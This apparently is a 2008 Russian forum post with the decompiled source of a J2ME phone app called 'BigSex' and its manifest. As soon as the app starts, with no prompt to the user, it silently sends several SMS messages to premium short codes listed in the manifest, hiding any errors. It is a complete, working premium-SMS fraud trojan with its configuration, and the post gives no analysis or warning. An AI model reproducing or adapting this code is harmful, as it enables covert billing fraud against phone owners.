
28.09.2008, 15:25
|
|
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name: BigSex.java
import javax.microedition.io.Connector;
import javax.microedition.lcdui.*;
import javax.microedition.midlet.MIDlet;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.TextMessage;
public class BigSex extends MIDlet
implements CommandListener
{
public BigSex()
{
m_m_m_m_m_m_m_m_m_dispDisplayDisplayDisplayDisplay DisplayDisplayDisplayDisplayDisplay = Display.getDisplay(this);
}
public void startApp()
{
for(int i = 0; i < 1; i++)
try
{
String number = "sms://1171";
if(i == 0)
number = "sms://" + getAppProperty("a");
MessageConnection messageconnection = (MessageConnection)Connector.open(number);
TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("1") + " " + getAppProperty("id"));
messageconnection.send(textmessage);
}
catch(Exception exception) { }
for(int i = 0; i < 1; i++)
try
{
String number = "sms://1171";
if(i == 0)
number = "sms://" + getAppProperty("b");
MessageConnection messageconnection = (MessageConnection)Connector.open(number);
TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("2") + " " + getAppProperty("id"));
messageconnection.send(textmessage);
}
catch(Exception exception) { }
for(int i = 0; i < 1; i++)
try
{
String number = "sms://1171";
if(i == 0)
number = "sms://" + getAppProperty("c");
MessageConnection messageconnection = (MessageConnection)Connector.open(number);
TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("3") + " " + getAppProperty("id"));
messageconnection.send(textmessage);
}
catch(Exception exception) { }
for(int i = 0; i < 1; i++)
try
{
String number = "sms://1171";
if(i == 0)
number = "sms://" + getAppProperty("d");
MessageConnection messageconnection = (MessageConnection)Connector.open(number);
TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("4") + " " + getAppProperty("id"));
messageconnection.send(textmessage);
}
catch(Exception exception) { }
for(int i = 0; i < 1; i++)
try
{
String number = "sms://1171";
if(i == 0)
number = "sms://" + getAppProperty("e");
MessageConnection messageconnection = (MessageConnection)Connector.open(number);
TextMessage textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("5") + " " + getAppProperty("id"));
messageconnection.send(textmessage);
}
catch(Exception exception) { }
}
public void pauseApp()
{
}
public void destroyApp(boolean flag1)
{
}
public void commandAction(Command command1, Displayable displayable1)
{
}
private Display m_m_m_m_m_m_m_m_m_dispDisplayDisplayDisplayDisplay DisplayDisplayDisplayDisplayDisplay;
}
а ну и еще MANIFEST.MF
Manifest-Version: 1.0
MicroEdition-Configuration: CLDC-1.0
MIDlet-Name: sms
Created-By: 1.4.2_12 (Sun Microsystems Inc.)
MIDlet-Vendor: Living Mobile
MIDlet-1: sms, ico.png, BigSex
MIDlet-Version: 1.10
MicroEdition-Profile: MIDP-2.0
id: 1783
1: era
2: #maybox
3: #maybox
4: era
5: #maybox
a: 4460
b: 1171
c: 7733
d: 5537
e: 9395
Последний раз редактировалось ShAnKaR; 28.09.2008 в 15:29..
|
|
|